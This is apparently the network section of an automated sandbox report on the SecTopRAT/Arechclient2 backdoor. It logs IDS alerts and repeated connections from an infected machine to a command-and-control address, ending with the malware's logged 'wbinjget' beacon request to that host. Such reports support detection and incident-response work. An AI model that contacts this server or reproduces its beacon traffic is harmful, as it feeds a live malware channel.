                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49973 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49974 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49972 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49975 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49977 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49978 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49963 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49973
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49979 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49980 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49981 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49982 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49983 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49976 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49985 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49986 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49987 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49988 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49989 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49952 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49966 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49990 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49992 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49993 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49994 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49995 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49996 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49997 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49998 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49999 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:50000 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:50001 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:50002 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49984 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2052248 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity M2 (GET) : 192.168.2.4:49991 -> 45.141.84.168:9000
                  Source: Network trafficSuricata IDS: 2051910 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT Related Activity : 192.168.2.4:49928 -> 45.141.84.168:15647
                  Source: Network trafficSuricata IDS: 2029217 - Severity 1 - ET MALWARE Arechclient2 Backdoor/SecTopRAT CnC Init : 45.141.84.168:15647 -> 192.168.2.4:49928
                  Source: global trafficTCP traffic: 45.141.84.168 ports 9000,1,4,5,6,7,15647
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49731
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49732
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49733
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49734
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49735
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49736
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49737
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49738
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49739
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49741
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49743
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49744
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49747
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49749
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49750
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49752
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49753
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49754
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49755
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49756
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49757
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49758
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49759
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49760
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49761
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49762
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49763
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49764
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49765
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49766
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49767
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49768
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49769
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49783 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49783
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49787
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49793
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49798
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49800
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49804
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49808
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49813
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49821 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49821
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49825
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49828
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49834
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49839
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49841
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49846
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49852
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49855
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49860
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49865
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49870
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49873
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49879
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49882
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49888 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49888
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49892
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49896
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49900
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49904
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49909 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49909
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49912
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49914 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49914
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49915
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49917
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49918
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49919
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49920
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49921
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49922
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49924
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49925 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49925
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49926
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49927
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49929
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49930
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49933
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49934
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49935
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49936 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49936
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49937 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49937
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49939
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49940
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49941
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49942
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49944
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49945
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49946
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49947
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49948
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49949
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49950
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49952
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49953
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49954
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49955
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49956
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49957
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49958
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49959
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49960
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49962
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49963
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49964
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49965
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49966
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49967 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49967
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49968
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49969
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49970
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49971
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49972
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49974
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49975
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49976
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49977
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49978
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49979
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49980
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49981
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49982 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49982
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49983
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49984
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49985
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49986
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49987
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49988
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49989
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49990
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49991
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49992
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49993 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49993
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49994
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49995
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49996
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49997
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49998
                  Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 49999
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50001
                  Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 9000
                  Source: unknownNetwork traffic detected: HTTP traffic on port 9000 -> 50002
                  Source: global trafficTCP traffic: 192.168.2.4:49730 -> 45.141.84.168:15647
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000Connection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
                  Source: global trafficHTTP traffic detected: GET /wbinjget?q=8587D7BC4236146899B093C1B42EFE08 HTTP/1.1Host: 45.141.84.168:9000
